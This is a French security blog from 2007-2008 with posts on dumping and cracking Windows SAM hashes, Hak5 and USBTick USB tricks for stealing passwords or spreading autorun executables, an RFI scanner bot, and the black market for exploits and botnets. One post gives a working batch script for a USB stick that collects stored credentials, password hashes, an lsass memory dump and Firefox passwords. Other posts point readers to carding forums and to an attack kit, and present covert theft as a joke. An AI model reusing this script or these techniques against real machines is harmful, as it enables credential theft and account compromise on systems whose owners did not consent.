articles
réactions
Jeff - 03.03.2008 | 3 réactions | #link | rss
Alors voilà, tout le monde dit qu'un des buts du h4x0r est d'arriver à extraire la SAM sur une machine Windows. Moi je dis "oué. Et ensuite?"

  • Tout d'abord, pour ceux qui viennent de sortir de leur caverne ou d'être décongelés par De Funès, la SAM se dump facilement -avec les droits adéquats- à l'aide de différents outils tels que Ophcrack, Pwdump ou FGdump. Notez que ce dernier est le plus abouti et qu'il essaye également d'extraire les données MScash ou cachedump, c'est-à-dire les hashes stockés temporairement sur la machine pour permettre à l'utilisateur de se connecter même si le domaine Windows n'est pas accessible (comme la majorité des itinérants de l'informatique).

    De base (je vais pas ré-écrire le manuel, hein... Allez voir ce lien), on récupère les 2 fichiers 127.0.0.1.pwdump et 127.0.0.1.cachedump, qui contiennent des hiéroglyphes tels que ci-dessous (tronqués pour que ca rentre):

    Administrator:500:E7B7DD8FAAD3B422B51404EE:EF3D83ACCFDABC63
    ASPNET:1004:0FBE2605119446A1066F301:B1D1A7BFDE90DA77CBD3DF4
    Guest:501:NO PASSWORD*************:NO PASSWORD***********:::

  • Chaque ligne contient 2 hashes, le premier correspond au format LM (lan manager) et le second au format NT LM qui est une version plus sécurisée du premier.

    Le format LM est foncièrement mauvais pour plusieurs raisons, parmi lesquelles le manque de Salt (graine additionnelle pour complexifier le craquage; elle évite par exemple que 2 mots de passe identiques ne donnent les mêmes hashés), le traitement par blocks de 7 caractères (un mot de passe de 9 caractères, c'est en fait un de 7 et un de 2) , que des majuscules, etc. Il n'est d'ailleurs plus utilisé sous Windows Vista. Il suffit pour cela de dumper la SAM et de voir que les champs LM sont vides.

    En attendant, il apparaît que la majorité des systèmes présentent ce mode de compatibilité par défaut. Et qu'il est donc très intéressant de savoir l'attaquer.

  • Les premiers réflexes consistent à attaquer les hashés directement: John-the-ripper s'impose même si d'autres outils existent. Ce logiciel supporte même le format "mscash" cité plus haut grâce à un patch ad-hoc. Il est conseillé de tester les modes dans l'ordre: --single, --wordlist puis --incremental.

  • Alors, si tous les mots de passe (ou aucun) n'ont pas été retrouvés, il est temps d'envisager une méthode plus moderne. Celle-ci fait appel aux fameuses Rainbow Tables. Ces tables sont une implémentation du principe de Time-memory trade-off en cryptographie. D'un point de vue général, aucun algorithme n'est absolument sécurisé; sa robustesse se mesure en terme de complexité (par exemple de factorisation modulaire en ce qui concerne RSA). Cette complexité est directement mesurable par des moyens pratiques et des statistiques: puissance de calcul, quantité de mémoire disponible pour les données, algorithmes de factorisation, accélération hardware, etc.

    Il se trouve que la technique des Rainbow Tables permet d'influer sur le ratio puissance de calcul (temps) / mémoire: en pré-calculant des données utiles au préalable et une fois pour toutes, il est possible de diminuer le temps de calcul lors de l'attaque. Plus les données pré-calculées seront importantes, plus l'attaque sera rapide (et efficace), et ce tant que les temps de chargement des tables en mémoire restent négligeables bien entendu. Ces tables sont en réalité composées de chaînes plus ou moins longues alternant fonctions de hachage et fonctions de réduction. Si le hashé attaqué est découvert dans une de ces chaînes, le mot de passe correspondant est alors retrouvé immédiatement.

    Les rainbow tables sont aujourd'hui utilisées et supportées dans de nombreux logiciels: Ophcrack2, Cain, RainbowCrack, etc.

    La prochaine phase de l'attaque consiste donc à utiliser des Rainbow Tables pour retrouver les mots de passe de la SAM. Il est nécessaire pour cela d'avoir des Rainbow Tables adéquates: du fait de la méthode utilisée, un jeu de tables n'est valide que pour un seul algorithme. Il est cependant possible d'en télécharger gratuitement via le peer-to-peer ou d'en acheter.

    Ensuite il suffit de préparer les tables (les ordonner) si cela n'a pas été fait, puis de lancer l'attaque. Notez que la génération des tables est bien entendu possible, si vous avez du temps et un gros disque dur.


  • Pour finir, des techniques hybrides sont apparues pour optimiser l'efficacité des tables sans pour autant en générer des Tera-octets. Ces tables hybrides semblent allier la technique des Rainbow Tables à l'efficacité des attaques par dictionnaire pour optimiser l'espace des mots de passe testés.

  • Notez enfin que tous les algorithmes ou méthodes basés sur des techniques de hachage peuvent être attaqués par ce biais. On trouvera par exemple des tables utiles au cassage de clés WPA.

Jeff - 25.02.2008 | 0 réactions | #link | rss
Ca bouge pour les amateurs de failles Web:

http://www.csnc.ch/misc/files/publications/the_onion_router_v1.0.pdf ce papier montre que l'on peut se placer en noeud de sortie (exit node) pour TOR, voir passer tout le trafic, modifier des requetes (je sais c'est pas nouveau, mais là c'est assez clair), pour rajouter du contenu dans les pages web à la volée (tel que Flash, Real, etc). Ce contenu, interprété par le navigateur, à pour but de forcer ce dernier ou l'add-on correspondant à contourner le tunnel TOR et ainsi révéler l'IP source. La papier montre par exemple comment faire des sockets avec Shockwave.

http://www.goolag.org pour ceux qui se souviennent du Cult of the Dead Cow (Back Orifice & co)... Un outil automatisant le Google hacking (mieux que celui de Foundstone, je suppose) et l'utilisation des dorks.

Enfin webapp_threats_and_countermeasures_v2.1.zip contient une matrice (en Allemand) sur les menaces du web. Utile comme checkliste.
Jeff - 18.02.2008 | 0 réactions | #link | rss

C'est un sujet récurrent chez moi, je sais...

Mais voici 2 articles intéressants:

  • le premier revient sur l'achat d'outils d'attaques. On connaissait les MPacks et autres toolkits agressifs (Italian job, etc...). Mais il est également possible d'acheter ou de louer des botnets (koica? Allez voir cet article) pour du spam et pour pas cher. Vous vous rappelez sans doute ces mails d'intox que vous recevez de temps en temps? On les appelle des "hoaxes" (voir hoaxbuster), et leur objectif est à la fois d'engorger les serveurs mails (cas d'attaques ciblées) mais également de récupérer vos adresses email (du fait que tout le monde se les transmet).
    Du coup, à l'autre bout de la chaîne, il suffit de récolter tout cela pour le revendre ensuite. Simple comme bonjour.

  • le second revient sur la vente d'exploits, à savoir des failles non publiques sur des logiciels courants. Ici, mode oblige, il s'agit de Windows Vista. Et les prix vont d'une poignée de dollars à plusieurs dizaines de milliers; quand on sait que Windows Vista n'est à ma connaissance pas encore déployé dans les entreprises, on comprendra que les cibles de ces attaques sont les utilisateurs de base, à savoir vous et moi. Si vous avez Vista :)

    Pour finir, je citerai ce vendeur d'antivirus qui se plaint de la situation: "I think the malware industry is making more money than the anti-malware industry". Sortez les mouchoirs.



Pour aller plus loin, certains seront intéressés par ces quelques liens:

  • Pour mieux connaitre MPack, allez voir ce site en Francais (oué), cette note du SANS, ce billet du CERT, l'interview d'un des codeurs, cette alerte de Websense, voir même une copie de l'outil. Attention, regardez-le à vos risques et périls, mais surtout n'espérez pas le ré-utiliser maintenant que toutes les failles ont été corrigées...

  • Le marché noir: de nombreux sites existent pour ces échanges, les plus sérieux étant d'un accès restreint (mais pas difficiles à trouver). Cherchez les forums de carding, par exemple: celui-ci, celui-là, etc. Il existe aussi des channels IRC, sur EFnet, Undernet, DALNet par exemple, où se vendent des listes entières de numéros de cartes de crédit, emails, systèmes, etc. Vous ne me croyez pas? Et si c'était vous sur ces images?



  • Parmi les sujets récurrents dans le milieu des apprentis pirates, celui de la fraude à la publicité est incontournable. En effet, les botnets peuvent avoir de multiples usages (envoyer du spam, relayer, faire des attaques par déni, etc) et certains ont logiquement essayé de les utiliser pour générer de faux clicks sur des bannières de publicité dynamiques (type adsense, Google adwords, etc). Les propriétaires étant rémunérés au nombre de clicks, l'intérêt est évident, mais la technique l'est moins.
    La littérature à ce sujet est assez importante, mais il est intéressant de citer ce paper de Hotbots 2007


Jeff - 16.02.2008 | 0 réactions | #link | rss
Alors voilà, comme c'est un sujet récurrent et à priori intéressant pour beaucoup de personnes (sans parler de leurs motivations), j'ai continué mes bidouilles après cet article.

On m'a judicieusement rappelé ce lien, que je n'étais pas allé voir depuis longtemps. Il s'agit des projets de Hak5, en l'occurrence les clés USB destinées à récupérer les mots de passe Windows.



Le projet propose plusieurs solutions, notez que plusieurs liens ne sont plus actifs (au moment où j'y suis allé). Ensuite, j'ai écarté les solutions se basant sur les clés U3, je n'avais pas envie de flasher ou débugger les outils proposés. Notez là aussi que ces procédés sont totalement réalisables, même si quelques effets de bord existent (images corrompues ou mal mises à jour) et qu'il est nécessaire de bien tester le processus avant de vouloir l'utiliser en live.

Alors, parmi les solutions restantes, je citerai "Gandalf's technique" et la "DLSS's update (v2)".
  • La première copie des fichiers sur le disque dur, les décompresse et les exécute avant de copier les résultats sur la clé et de tout effacer. Je n'ai pas eu des résultats brillants, juste quelques infos générales quand le script ne plantait pas (le répertoire temporaire sur le disque peut être accédé directement avec %temp%, cela permet de suivre l'état d'avancement du processus).

  • La deuxième semble beaucoup plus prometteuse. D'une part elle est assez discrète et rapide, d'autre part je n'ai pas eu d'effet de bord (du genre "Lsass.exe a rencontré une erreur et votre PC va rebooter dans 60 secondes"). En clair, soit cela marche et l'on récupère les hashes et autres mots de passe enregistrés, soit cela ne marche pas mais aucune erreur n'est générée (à part dans le fichier de résultats). Le tout présenté sobrement et efficacement pour s'y retrouver facilement.


Dans les 2 cas, bien placer les fichiers à la racine de la clé, sinon les scripts s'emmêlent les pinceaux et aucun résultat n'est loggé.

A suivre...
Jeff - 15.02.2008 | 1 réactions | #link | rss
Ayé, on peut télécharger toute la conf du CCC, la 24C3, en vidéo. Et c'est ici.

Pouet.

Jeff - 13.02.2008 | 0 réactions | #link | rss
On avait cru la mode terminée. Après le Month of Browser fun, le Month of Kernel Fun, le Month of PHP Bugs, le Month of Apple Bugs, le Month of ActiveX Bugs, voici peut-être le Month of home router bugs...

Les home routers, ce sont toutes les "boxes" ADSL fournies par les FAI pour permettre aux gens de se connecter: Freebox, Neufbox, Livebox, etc. Elles proposent habituellement quelques services de base, et surtout sont peu sécurisées pour permettre à chacun de les utiliser facilement (déballage-branchement-click&go).

A l'origine de l'initiative, on retrouve Gnucitizen. Ils avaient déjà publié des articles concernant les routeurs fournis par BT, très répandus au Royaume Uni. Ils y exposaient le manque de contrôle d'accès flagrant qui permettait de contourner l'utilisation du mot de passe admin pour effectuer des opérations sur le routeur. Au vu du manque de réaction, ils ont continué leurs expériences avec l'émission d'appels VoIP inattendus. Et vu le succès de ce genre d'études, ils ont donc démarré le router hacking challenge.

Notons que l'initiative n'est pas isolée, puisque la Neufbox a déjà été abordée sur le blog de devloop.

Personnellement, je continue à alimenter mes stats sur les mots de passe de ces routeurs domestiques ;)
Jeff - 22.12.2007 | 1 réactions | #link | rss
Après le premier article consacré aux traces laissées dans Windows, la logique voulait que je parle des outils qui permettent de récupérer ces informations, en particulier les mots de passe.

La plupart des outils cités dans ce billet sont utilisables en ligne de commande, ce qui permet donc de les exécuter avec un simple shell (Dos). L'exception concerne Cain, qui aux dernières nouvelles supporterait tellement de fonctionnalités qu'il en devient incontournable.



Une fois ces outils téléchargés, que faire me dira-t-on? Eh bien imaginez une clé USB, avec tous les softs dessus. Le script suivant permet de récolter pas mal d'infos:

## General infos gathering: "set" et "ver" affichent les caractéristiques du système, ipconfig celles du réseau et mountvol les lecteurs
ver > infos.txt
set >> infos.txt
ipconfig /ALL >> infos.txt
mountvol >> infos.txt

## Credentials extraction: ces outils affichent le contenu du protected storage, à savoir les mots de passe enregistrés
pstoreview.exe > log1.txt
creddump.exe > log2.txt

## Hashes dump (cache as well): ces outils tentent d'extraire les hashes Windows, correspondant aux mot de passe de login, même ceux en cache (voir l'article précédent)
pwdump.exe localhost > log3.txt
fgdump.exe -r -k

## Lsass dump: ici, on dump la mémoire d'un processus en cours d'execution - lsass.exe qui contient lui aussi les hashes. Cette procédure est appliquable à d'autres processus.
pmdump.exe -list > plist.txt
type plist.txt | findstr lsass > tmp.txt
FOR /f %%a in (tmp.txt) do set pid=%%a
pmdump.exe %pid% lsass.dump
DEL tmp.txt

## Additional: extrait les mots de passe de firefox. Voir l'article
dumpAutoComplete.exe > firefox.txt


A suivre.
Jeff - 20.12.2007 | 4 réactions | #link | rss

Un petit outil rigolo et sympa qui fera rire vos amis (ou pas): l'USBTick v2.

Le principe est simple: il faut choisir un executable (rigolo lui aussi), l'outil génère un autorun adéquat puis attend qu'une clé USB soit connectée. Lorsque celle-ci est branchée, il copie exe et autorun dessus, et ce automatiquement.

Il y a ensuite de fortes chances pour que l'autorun s'exécute (et donc l'exécutable avec) la prochaine fois que le propriétaire branchera sa clé.

L'aspect rigolo réside bien entendu dans le fait que tout ceci s'effectue automatiquement et discrètement dès qu'une clé est branchée.

J'en connais qui vont rire jaune...

EDIT: project homepage ICI
Jeff - 19.12.2007 | 0 réactions | #link | rss

Alors, tu cliques ici, tu copies là, tu tapes entrée... et c'est tout bon mon petit.

Ou presque.

Ici, c'est là en fait: http://www.ipasvi.roma.it/ita/plugins/spamx/fran2.txt
ou encore http://defaced.serapis.net/filez/scan_bot/Pitbullbot.txt

Voyons. Publique. RFI scanner (pour "remote file include/inclusion") automatisé (bot). Pas mal tout ca, bonne pêche. Encore des gens qui s'acharnent sur les forums en PHP qui fleurissent un peu partout. Par contre, l'italien et moi ca fait 2, et il y a pas mal de caractères bizarres plus bas. Qu'à cela ne tienne, super gogol (Google) à la rescousse, me dit que cela ressemble à la page:

http://nationwide-contest.net/brap6.pl


Page qui n'existe plus, bien sûr, sauf que la mémoire divine de super gogol me donne toujours accès à la version en cache et là, paf! "PRIVATE" version... Gnarf gnarf gnarf...

Quel intérêt me dira-t-on? Euh... En fait, je trouvais juste les fonctions de recherche sympa...

Et pis, on peut creuser plus loin, hein. A partir de "The_Pitbull" et autres charmants acronymes trouvés dans le code, on remonte à des choses bien plus croustillantes:

  • Des forums d'échanges, où l'on peut même trouver une version spéciale pour Noel (qui a dit que les hackers ne croyaient plus au Père Noel?)

  • Des pseudo-sites webs contenant des listes de commandes ou des configurations

  • Des versions modifiées qui ont changé de nom

  • Des web shells PHP bien connus (suivez mon regard -china c'est pour toi-).

  • Des gens qui l'ont testé pour vous (mais que je ne citerai pas). Si si!!


Noel avant l'heure, vous dis-je!
Jeff - 17.12.2007 | 0 réactions | #link | rss
Petit framework découvert il y a peu, Inguma semble très prometteur, et pourrait pourquoi pas compléter judicieusement Metasploit sur les aspects découverte et fuzzing.

L'outil a d'ailleurs déjà été repéré par Red Database Security pour ses composants dédiés aux bases Oracle, mais aussi par Darknet en ce qui concerne toutes les autres possibilités qu'il propose: tests HTTP, analyse NetBios et redirection ARP.

En tout cas, le résultat semble suffisament intéressant pour être mentionné.
FutureBlogs - v.0.8.6beta - Ce site est hébergé par http://monblog.ch